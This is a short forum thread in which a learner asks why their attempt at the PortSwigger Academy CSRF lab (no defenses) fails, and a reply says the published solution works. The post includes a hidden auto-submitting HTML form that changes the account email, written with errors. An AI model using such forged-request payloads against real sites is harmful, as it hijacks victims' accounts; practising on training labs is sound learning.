I am trying to solve the CSRF exercise/tutorial. I'm new to burp/port swigger. Here is a link to the exercise: https://portswigger.net/web-security/csrf/lab-no-defenses
The solution I came up with is this:
<form method="$POST" action="https://acfd1fc01ec27f6f80b26b810015001d.web-security-academy.net/email"> <input type="hidden" name="$email" value="$badEmail@bad.com"> </form> <script> document.forms.submit(); </script>
After checking to see if it works I am brought back to the fake change email page and I can see the values changed/represented in the URL but the icon that says "unsolved" doesn't change to "solved". Does anyone know what I'm doing wrong?
Have you followed the steps in the solution?
We’ve tested the solution and it works for us.